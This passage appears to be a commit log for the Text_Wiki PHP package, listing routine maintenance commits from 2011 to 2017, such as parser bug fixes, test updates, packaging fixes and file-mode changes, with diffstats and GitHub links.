 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/3e4f57794bc666e9c9a16c468f94180312e2c012

-----------------------------------------------------------------------

commit d2f9f40fee0037d1cf4423deb93d5d8b6cb6eea7
Author: Till Klampaeckel 
Date:   Sat Mar 19 19:12:24 2011 +0000

     * added BugTests (work in progress)
     * rename test suite
    
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 309450 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/AllTests.php | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/d2f9f40fee0037d1cf4423deb93d5d8b6cb6eea7

-----------------------------------------------------------------------

commit 035d469ae18281224d7b1c059a07b827ce4de23e
Author: Till Klampaeckel 
Date:   Sat Mar 19 19:25:06 2011 +0000

     * added appropriate require_once calls, #14604
    
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 309451 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Freelink.php | 4 +++-
 Text/Wiki/Render/Latex/Wikilink.php | 5 ++++-
 2 files changed, 7 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/035d469ae18281224d7b1c059a07b827ce4de23e

-----------------------------------------------------------------------

commit c781a15b4aaf5f58a8d5e767106c42a5f2b4c6ec
Author: Till Klampaeckel 
Date:   Sat Mar 19 22:33:28 2011 +0000

     * bugfix for #11649: regex updated (from Horde, thanks yunosh)
    
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 309454 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Code.php | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/c781a15b4aaf5f58a8d5e767106c42a5f2b4c6ec

-----------------------------------------------------------------------

commit 3349762824e692bec7b7ff10e4359b1c9500b78c
Author: Till Klampaeckel 
Date:   Sat Mar 19 22:41:42 2011 +0000

    fixture and test for #11649
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 309455 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/Text_Wiki_BugTests.php |  15 ++
 tests/fixtures/bug11649.txt  | 521 +++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 536 insertions(+)
 create mode 100644 tests/fixtures/bug11649.txt

http://github.com/horde/horde/commit/3349762824e692bec7b7ff10e4359b1c9500b78c

-----------------------------------------------------------------------

commit 784aca94a73d98c6ebc6a2e25872cc15a2238e21
Author: Daniel Convissor 
Date:   Wed Dec 7 01:25:12 2011 +0000

    Remove error reporting in tests. (Bug #19028)
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 320546 c90b9560-bf6c-de11-be94-00142212c4b1

 tests/BBCode/7908.phpt        | 1 -
 tests/Cowiki_Render_Url.phpt  | 1 -
 tests/Creole_Parse_Url.phpt   | 1 -
 tests/Creole_Render_Url.phpt  | 1 -
 tests/Docbook_Render_Url.phpt | 1 -
 tests/Doku_Render_Url.phpt    | 1 -
 tests/Latex_Render_Url.phpt   | 1 -
 tests/Plain_Render_Url.phpt   | 1 -
 tests/Xhtml_Render_Url.phpt   | 1 -
 9 files changed, 9 deletions(-)

http://github.com/horde/horde/commit/784aca94a73d98c6ebc6a2e25872cc15a2238e21

-----------------------------------------------------------------------

commit a630e55fde1f3174e6823aace2cdcfc3cfc59179
Author: Daniel O'Connor 
Date:   Mon Jan 2 11:19:52 2012 +1030

    Bug #12722 HTML Blockquote compliance

 Text/Wiki/Render/Xhtml/Blockquote.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/a630e55fde1f3174e6823aace2cdcfc3cfc59179

-----------------------------------------------------------------------

commit aa6de8169b6ae81ca13403cf7b454767dbf33700
Author: Daniel O'Connor 
Date:   Mon Jan 2 11:23:56 2012 +1030

    Request #12569 Adding 'base_url' to XHTML Toc renderer

 Text/Wiki/Render/Xhtml/Toc.php | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/aa6de8169b6ae81ca13403cf7b454767dbf33700

-----------------------------------------------------------------------

commit 35d44f0c934cb666ea9a224b698c8622e438c6d9
Author: Daniel O'Connor 
Date:   Mon Jan 2 11:25:32 2012 +1030

    Bug #12719 Blockquote parsing bugs

 Text/Wiki/Parse/Default/Blockquote.php | 36 +++++++++-------------------------
 1 file changed, 9 insertions(+), 27 deletions(-)

http://github.com/horde/horde/commit/35d44f0c934cb666ea9a224b698c8622e438c6d9

-----------------------------------------------------------------------

commit 4fd401533f1fbb0a7e5e252b59cb626890db8eed
Author: Daniel O'Connor 
Date:   Mon Jan 2 15:49:16 2012 +1030

    Fix skip behaviour check

 tests/skipif.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/4fd401533f1fbb0a7e5e252b59cb626890db8eed

-----------------------------------------------------------------------

commit ee8e07e435769a9393de9d702db605e2b91953e9
Author: Daniel O'Connor 
Date:   Mon Jan 2 15:53:14 2012 +1030

    Remove skipping behaviour

 tests/config.php.dist | 5 -----
 tests/skipif.php      | 4 ----
 2 files changed, 9 deletions(-)
 delete mode 100644 tests/config.php.dist
 delete mode 100644 tests/skipif.php

http://github.com/horde/horde/commit/ee8e07e435769a9393de9d702db605e2b91953e9

-----------------------------------------------------------------------

commit 06b707b7972f4d1dff20f17381c821f2b38b9326
Author: Daniel O'Connor 
Date:   Mon Jan 2 15:53:18 2012 +1030

    Remove skipping behaviour

 tests/Cowiki_Render_Url.phpt        | 5 +----
 tests/Creole_Parse_Url.phpt         | 3 ---
 tests/Creole_Render_Url.phpt        | 5 +----
 tests/Default_Parse_BlockQuote.phpt | 3 ---
 tests/Docbook_Render_Url.phpt       | 5 +----
 tests/Doku_Render_Url.phpt          | 5 +----
 tests/Latex_Render_Url.phpt         | 5 +----
 tests/Plain_Render_Url.phpt         | 3 ---
 tests/Xhtml_Render_Url.phpt         | 3 ---
 9 files changed, 5 insertions(+), 32 deletions(-)

http://github.com/horde/horde/commit/06b707b7972f4d1dff20f17381c821f2b38b9326

-----------------------------------------------------------------------

commit 3c85b29e42bcfad40f3a3867371489d9231a4d43
Author: Daniel O'Connor 
Date:   Mon Jan 2 16:07:42 2012 +1030

    Updated test expectations

 tests/Xhtml_Render_Url.phpt | 16 ++++++----------
 1 file changed, 6 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/3c85b29e42bcfad40f3a3867371489d9231a4d43

-----------------------------------------------------------------------

commit 076d0bd678550b6b44910fcdd25cf02f19e10a3f
Author: Daniel O'Connor 
Date:   Mon Jan 2 16:09:33 2012 +1030

    Update test expectations

 tests/Plain_Render_Url.phpt | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/076d0bd678550b6b44910fcdd25cf02f19e10a3f

-----------------------------------------------------------------------

commit 16cc24f53f9662b651014352a53bf0f396161476
Author: Daniel O'Connor 
Date:   Mon Jan 2 16:14:34 2012 +1030

    Prevent E_NOTICE

 Text/Wiki/Render/Doku/Url.php | 16 ++++++++++++----
 1 file changed, 12 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/16cc24f53f9662b651014352a53bf0f396161476

-----------------------------------------------------------------------

commit 8c57af527632bc87da52917471fdce5065a78825
Author: Daniel O'Connor 
Date:   Mon Jan 2 16:18:15 2012 +1030

    Updated test expectations (TODO - go learn more about LaTeX to ensure this is actually correct)

 tests/Latex_Render_Url.phpt | 16 ++++++++++------
 1 file changed, 10 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/8c57af527632bc87da52917471fdce5065a78825

-----------------------------------------------------------------------

commit b46b4b1bd252825e0db6f2fe0b482101e767ce01
Author: till 
Date:   Mon Feb 17 17:34:54 2014 +0100

    Enhancement: composer setup

 .gitignore    |  4 ++++
 composer.json | 41 +++++++++++++++++++++++++++++++++++++++++
 2 files changed, 45 insertions(+)
 create mode 100644 .gitignore
 create mode 100644 composer.json

http://github.com/horde/horde/commit/b46b4b1bd252825e0db6f2fe0b482101e767ce01

-----------------------------------------------------------------------

commit 256a03e047b0c8b5c1537cd7b47de173706d36f3
Author: till 
Date:   Mon Feb 17 23:38:16 2014 +0100

    Enhancement: composer setup

 composer.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/256a03e047b0c8b5c1537cd7b47de173706d36f3

-----------------------------------------------------------------------

commit fdd6eb9ab2701b8634f8f984797d7781a15bc56a
Author: Daniel O'Connor 
Date:   Sat Mar 22 20:38:10 2014 +1030

    Add travis

 .travis.yml | 6 ++++++
 1 file changed, 6 insertions(+)
 create mode 100644 .travis.yml

http://github.com/horde/horde/commit/fdd6eb9ab2701b8634f8f984797d7781a15bc56a

-----------------------------------------------------------------------

commit ca16f8b5d62558258d0851368a7395631ff52786
Author: Daniel O'Connor 
Date:   Sat Mar 22 20:42:46 2014 +1030

    Bug #20110	package.xml does not validate

 package.xml | 1 +
 1 file changed, 1 insertion(+)

http://github.com/horde/horde/commit/ca16f8b5d62558258d0851368a7395631ff52786

-----------------------------------------------------------------------

commit 7ab421c0ad424654daf863c3b18640f06164de4a
Author: Daniel O'Connor 
Date:   Sat Mar 22 20:44:13 2014 +1030

    Remove package 1.0

 packageBBCode.xml  | 228 ++++++++++++++++++++++++++++++++---------------------
 packageBBCode2.xml | 146 ----------------------------------
 2 files changed, 136 insertions(+), 238 deletions(-)
 delete mode 100644 packageBBCode2.xml

http://github.com/horde/horde/commit/7ab421c0ad424654daf863c3b18640f06164de4a

-----------------------------------------------------------------------

commit 565531c8c1dd17a550633740388610f764562dd1
Author: Daniel O'Connor 
Date:   Sat Mar 22 20:48:56 2014 +1030

    Bug #20110	package.xml does not validate

 packageMediawiki.xml | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/565531c8c1dd17a550633740388610f764562dd1

-----------------------------------------------------------------------

commit 2eab64a8a4249bef791a15b1754819ddea247eb8
Author: Daniel O'Connor 
Date:   Sat Mar 22 20:49:56 2014 +1030

    Bug #20110	package.xml does not validate

 packageCowiki.xml | 247 ++++++++++++++++++++++++++++++------------------------
 1 file changed, 139 insertions(+), 108 deletions(-)

http://github.com/horde/horde/commit/2eab64a8a4249bef791a15b1754819ddea247eb8

-----------------------------------------------------------------------

commit 35063a6982c1c567ea7d1cc57e0e2ac4ec2416c2
Author: Daniel O'Connor 
Date:   Sat Mar 22 20:50:33 2014 +1030

    Bug #20110	package.xml does not validate

 packageDoku.xml | 245 +++++++++++++++++++++++++++++++-------------------------
 1 file changed, 138 insertions(+), 107 deletions(-)

http://github.com/horde/horde/commit/35063a6982c1c567ea7d1cc57e0e2ac4ec2416c2

-----------------------------------------------------------------------

commit 15608472b6d92bf2d333e86e51975bbdb28777a0
Author: Remi Collet 
Date:   Sun May 18 09:22:39 2014 +0200

    Cleanup some license headers
    Fix pear bug #20274
    Also see 21ce607014ae3445147be2e52ceacdca0ca7b503

 Text/Wiki/Render/Cowiki/Prefilter.php | 45 ++++++++++++-----------------------
 Text/Wiki/Render/Doku/Prefilter.php   | 45 ++++++++++++-----------------------
 Text/Wiki/Render/Latex/Prefilter.php  | 34 +-------------------------
 Text/Wiki/Render/Plain/Prefilter.php  |  2 +-
 Text/Wiki/Render/Tiki/Prefilter.php   | 45 ++++++++++++-----------------------
 5 files changed, 47 insertions(+), 124 deletions(-)

http://github.com/horde/horde/commit/15608472b6d92bf2d333e86e51975bbdb28777a0

-----------------------------------------------------------------------

commit c3920467b0be0cb8604c9994969bb303e0ef9925
Author: Daniel O'Connor 
Date:   Sat Jun 7 11:18:21 2014 +0930

    Release prep

 package.xml | 696 +++++++++++++++++++++++++++++++++---------------------------
 1 file changed, 388 insertions(+), 308 deletions(-)

http://github.com/horde/horde/commit/c3920467b0be0cb8604c9994969bb303e0ef9925

-----------------------------------------------------------------------

commit 639b4a562ed73ac78ccf4bc002dcf6f3ff98902b
Author: Daniel O'Connor 
Date:   Sat Jun 7 11:25:26 2014 +0930

    Trailing tag

 Text/Wiki.php | 2 --
 1 file changed, 2 deletions(-)

http://github.com/horde/horde/commit/639b4a562ed73ac78ccf4bc002dcf6f3ff98902b

-----------------------------------------------------------------------

commit ded586e18d3c9d0bc423abcedf9adec7f831693c
Author: Daniel O'Connor 
Date:   Thu Nov 5 01:16:18 2015 +1030

    Update

 .travis.yml   |  1 +
 Text/Wiki.php | 41 ++++++++++++++++++++---------------------
 2 files changed, 21 insertions(+), 21 deletions(-)

http://github.com/horde/horde/commit/ded586e18d3c9d0bc423abcedf9adec7f831693c

-----------------------------------------------------------------------

commit 1bad1aae5e7fbe899f5c3ea4027bedf661539505
Author: Christian Weiske 
Date:   Wed Feb 22 20:14:00 2017 +0100

    PHP5 constructor must be first for upwards compatibility

 Text/Wiki.php | 43 +++++++++++++++++++++++--------------------
 1 file changed, 23 insertions(+), 20 deletions(-)

http://github.com/horde/horde/commit/1bad1aae5e7fbe899f5c3ea4027bedf661539505

-----------------------------------------------------------------------

commit 056aacd3e25ddeb18975d0ddd8e772da4543f942
Author: Christian Weiske 
Date:   Wed Feb 22 21:47:39 2017 +0100

    Make static methods static

 Text/Wiki.php | 20 +++++++-------------
 1 file changed, 7 insertions(+), 13 deletions(-)

http://github.com/horde/horde/commit/056aacd3e25ddeb18975d0ddd8e772da4543f942

-----------------------------------------------------------------------

commit eaa30b35bbfe157f406acf5a454bf8048a1f3952
Author: Jan Schneider 
Date:   Thu Feb 23 21:44:47 2017 +0100

    Fix file modes.

 Text/Wiki/Parse.php                     | 0
 Text/Wiki/Parse/Default/Blockquote.php  | 0
 Text/Wiki/Parse/Default/Bold.php        | 0
 Text/Wiki/Parse/Default/Break.php       | 0
 Text/Wiki/Parse/Default/Center.php      | 0
 Text/Wiki/Parse/Default/Code.php        | 0
 Text/Wiki/Parse/Default/Colortext.php   | 0
 Text/Wiki/Parse/Default/Deflist.php     | 0
 Text/Wiki/Parse/Default/Delimiter.php   | 0
 Text/Wiki/Parse/Default/Embed.php       | 0
 Text/Wiki/Parse/Default/Emphasis.php    | 0
 Text/Wiki/Parse/Default/Freelink.php    | 0
 Text/Wiki/Parse/Default/Heading.php     | 0
 Text/Wiki/Parse/Default/Horiz.php       | 0
 Text/Wiki/Parse/Default/Html.php        | 0
 Text/Wiki/Parse/Default/Image.php       | 0
 Text/Wiki/Parse/Default/Include.php     | 0
 Text/Wiki/Parse/Default/Interwiki.php   | 0
 Text/Wiki/Parse/Default/Italic.php      | 0
 Text/Wiki/Parse/Default/List.php        | 0
 Text/Wiki/Parse/Default/Newline.php     | 0
 Text/Wiki/Parse/Default/Paragraph.php   | 0
 Text/Wiki/Parse/Default/Phplookup.php   | 0
 Text/Wiki/Parse/Default/Prefilter.php   | 0
 Text/Wiki/Parse/Default/Raw.php         | 0
 Text/Wiki/Parse/Default/Revise.php      | 0
 Text/Wiki/Parse/Default/Strong.php      | 0
 Text/Wiki/Parse/Default/Subscript.php   | 0
 Text/Wiki/Parse/Default/Superscript.php | 0
 Text/Wiki/Parse/Default/Table.php       | 0
 Text/Wiki/Parse/Default/Tighten.php     | 0
 Text/Wiki/Parse/Default/Toc.php         | 0
 Text/Wiki/Parse/Default/Tt.php          | 0
 Text/Wiki/Parse/Default/Url.php         | 0
 Text/Wiki/Parse/Default/Wikilink.php    | 0
 Text/Wiki/Render.php                    | 0
 Text/Wiki/Render/Plain.php              | 0
 Text/Wiki/Render/Plain/Blockquote.php   | 0
 Text/Wiki/Render/Plain/Bold.php         | 0
 Text/Wiki/Render/Plain/Break.php        | 0
 Text/Wiki/Render/Plain/Center.php       | 0
 Text/Wiki/Render/Plain/Code.php         | 0
 Text/Wiki/Render/Plain/Colortext.php    | 0
 Text/Wiki/Render/Plain/Deflist.php      | 0
 Text/Wiki/Render/Plain/Delimiter.php    | 0
 Text/Wiki/Render/Plain/Embed.php        | 0
 Text/Wiki/Render/Plain/Emphasis.php     | 0
 Text/Wiki/Render/Plain/Freelink.php     | 0
 Text/Wiki/Render/Plain/Heading.php      | 0
 Text/Wiki/Render/Plain/Horiz.php        | 0
 Text/Wiki/Render/Plain/Html.php         | 0
 Text/Wiki/Render/Plain/Image.php        | 0
 Text/Wiki/Render/Plain/Include.php      | 0
 Text/Wiki/Render/Plain/Interwiki.php    | 0
 Text/Wiki/Render/Plain/Italic.php       | 0
 Text/Wiki/Render/Plain/List.php         | 0
 Text/Wiki/Render/Plain/Newline.php      | 0
 Text/Wiki/Render/Plain/Paragraph.php    | 0
 Text/Wiki/Render/Plain/Phplookup.php    | 0
 Text/Wiki/Render/Plain/Prefilter.php    | 0
 Text/Wiki/Render/Plain/Raw.php          | 0
 Text/Wiki/Render/Plain/Revise.php       | 0
 Text/Wiki/Render/Plain/Strong.php       | 0
 Text/Wiki/Render/Plain/Superscript.php  | 0
 Text/Wiki/Render/Plain/Table.php        | 0
 Text/Wiki/Render/Plain/Tighten.php      | 0
 Text/Wiki/Render/Plain/Toc.php          | 0
 Text/Wiki/Render/Plain/Tt.php           | 0
 Text/Wiki/Render/Plain/Url.php          | 0
 Text/Wiki/Render/Plain/Wikilink.php     | 0
 Text/Wiki/Render/Xhtml.php              | 0
 Text/Wiki/Render/Xhtml/Blockquote.php   | 0
 Text/Wiki/Render/Xhtml/Bold.php         | 0
 Text/Wiki/Render/Xhtml/Break.php        | 0
 Text/Wiki/Render/Xhtml/Center.php       | 0
 Text/Wiki/Render/Xhtml/Code.php         | 0
 Text/Wiki/Render/Xhtml/Colortext.php    | 0
 Text/Wiki/Render/Xhtml/Deflist.php      | 0
 Text/Wiki/Render/Xhtml/Delimiter.php    | 0
 Text/Wiki/Render/Xhtml/Embed.php        | 0
 Text/Wiki/Render/Xhtml/Emphasis.php     | 0
 Text/Wiki/Render/Xhtml/Freelink.php     | 0
 Text/Wiki/Render/Xhtml/Function.php     | 0
 Text/Wiki/Render/Xhtml/Heading.php      | 0
 Text/Wiki/Render/Xhtml/Horiz.php        | 0
 Text/Wiki/Render/Xhtml/Html.php         | 0
 Text/Wiki/Render/Xhtml/Image.php        | 0
 Text/Wiki/Render/Xhtml/Include.php      | 0
 Text/Wiki/Render/Xhtml/Interwiki.php    | 0
 Text/Wiki/Render/Xhtml/Italic.php       | 0
 Text/Wiki/Render/Xhtml/List.php         | 0
 Text/Wiki/Render/Xhtml/Newline.php      | 0
 Text/Wiki/Render/Xhtml/Paragraph.php    | 0
 Text/Wiki/Render/Xhtml/Phplookup.php    | 0
 Text/Wiki/Render/Xhtml/Prefilter.php    | 0
 Text/Wiki/Render/Xhtml/Raw.php          | 0
 Text/Wiki/Render/Xhtml/Revise.php       | 0
 Text/Wiki/Render/Xhtml/Strong.php       | 0
 Text/Wiki/Render/Xhtml/Subscript.php    | 0
 Text/Wiki/Render/Xhtml/Superscript.php  | 0
 Text/Wiki/Render/Xhtml/Table.php        | 0
 Text/Wiki/Render/Xhtml/Tighten.php      | 0
 Text/Wiki/Render/Xhtml/Toc.php          | 0
 Text/Wiki/Render/Xhtml/Tt.php           | 0
 Text/Wiki/Render/Xhtml/Url.php          | 0
 Text/Wiki/Render/Xhtml/Wikilink.php     | 0
 106 files changed, 0 insertions(+), 0 deletions(-)
 mode change 100755 => 100644 Text/Wiki/Parse.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Blockquote.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Bold.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Break.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Center.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Code.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Colortext.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Deflist.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Delimiter.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Embed.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Emphasis.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Freelink.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Heading.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Horiz.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Html.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Image.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Include.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Interwiki.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Italic.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/List.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Newline.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Paragraph.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Phplookup.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Prefilter.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Raw.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Revise.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Strong.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Subscript.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Superscript.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Table.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Tighten.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Toc.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Tt.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Url.php
 mode change 100755 => 100644 Text/Wiki/Parse/Default/Wikilink.php
 mode change 100755 => 100644 Text/Wiki/Render.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Blockquote.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Bold.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Break.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Center.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Code.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Colortext.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Deflist.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Delimiter.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Embed.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Emphasis.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Freelink.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Heading.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Horiz.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Html.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Image.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Include.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Interwiki.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Italic.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/List.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Newline.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Paragraph.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Phplookup.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Prefilter.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Raw.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Revise.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Strong.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Superscript.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Table.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Tighten.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Toc.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Tt.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Url.php
 mode change 100755 => 100644 Text/Wiki/Render/Plain/Wikilink.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Blockquote.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Bold.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Break.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Center.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Code.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Colortext.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Deflist.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Delimiter.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Embed.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Emphasis.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Freelink.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Function.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Heading.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Horiz.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Html.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Image.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Include.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Interwiki.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Italic.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/List.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Newline.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Paragraph.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Phplookup.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Prefilter.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Raw.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Revise.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Strong.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Subscript.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Superscript.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Table.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Tighten.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Toc.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Tt.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Url.php
 mode change 100755 => 100644 Text/Wiki/Render/Xhtml/Wikilink.php

http://github.com/horde/horde/commit/eaa30b35bbfe157f406acf5a454bf8048a1f3952

-----------------------------------------------------------------------

commit ed26febca9641df3e14390d5e211289722f1859e
Author: Jan Schneider 
Date:   Mon Feb 27 21:11:48 2017 +0100

    Make constructors BC and FC.

 Text/Wiki/Parse.php                   |  18 ++-
 Text/Wiki/Parse/Default/Delimiter.php |  73 +++++++-----
 Text/Wiki/Parse/Default/Freelink.php  |  82 +++++++------
 Text/Wiki/Parse/Default/Image.php     |  17 ++-
 Text/Wiki/Parse/Default/Smiley.php    |  17 ++-
 Text/Wiki/Parse/Default/Url.php       | 209 ++++++++++++++++++----------------
 Text/Wiki/Parse/Default/Wikilink.php  |  22 +++-
 Text/Wiki/Render.php                  |  18 ++-
 Text/Wiki/Render/Docbook/Heading.php  |  20 +++-
 9 files changed, 308 insertions(+), 168 deletions(-)

http://github.com/horde/horde/commit/ed26febca9641df3e14390d5e211289722f1859e

-----------------------------------------------------------------------

commit 14ac6f7d69754d6fb5fc3ab64eaa5386b5e4e1fa
Author: Jan Schneider 
Date:   Mon Feb 27 22:17:11 2017 +0100

    Remove debug output.

 tests/Text_Wiki_BugTests.php | 1 -
 1 file changed, 1 deletion(-)

http://github.com/horde/horde/commit/14ac6f7d69754d6fb5fc3ab64eaa5386b5e4e1fa

-----------------------------------------------------------------------

commit 894f823f7f0503a49101167966912286e14c13f9
Author: Jan Schneider 
Date:   Mon Feb 27 22:17:45 2017 +0100

    Remove unnecessary reference, causing E_NOTICEs.

 Text/Wiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/894f823f7f0503a49101167966912286e14c13f9

-----------------------------------------------------------------------

commit 438cd5330e898e1203e28ca174114ca3c38d9a39
Author: Jan Schneider 
Date:   Wed Aug 30 14:16:24 2017 +0200

    Don't strip the leading linebreak off blockquotes.

 Text/Wiki/Parse/Default/Blockquote.php | 94 +++++++++++++++++-----------------
 1 file changed, 47 insertions(+), 47 deletions(-)

http://github.com/horde/horde/commit/438cd5330e898e1203e28ca174114ca3c38d9a39

-----------------------------------------------------------------------

commit b0d63cb1b3134076b32fdc2da0121aebe8f5f399
Author: Jan Schneider 
Date:   Wed Aug 30 14:16:41 2017 +0200

    Fix test.

 tests/Default_Parse_BlockQuote.phpt | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/b0d63cb1b3134076b32fdc2da0121aebe8f5f399

-----------------------------------------------------------------------

commit 301610e98ebc566fdfa502c74fe2e9f05fe8c369
Author: Jan Schneider 
Date:   Wed Aug 30 14:35:16 2017 +0200

    Fix tests.
    
    Use the default markup/parser, that's always available after the git split.

 tests/Docbook_Render_Url.phpt | 16 ++++++----------
 tests/Latex_Render_Url.phpt   | 11 ++++-------
 tests/Plain_Render_Url.phpt   | 11 ++++-------
 tests/Xhtml_Render_Url.phpt   | 13 +++++++------
 4 files changed, 21 insertions(+), 30 deletions(-)

http://github.com/horde/horde/commit/301610e98ebc566fdfa502c74fe2e9f05fe8c369

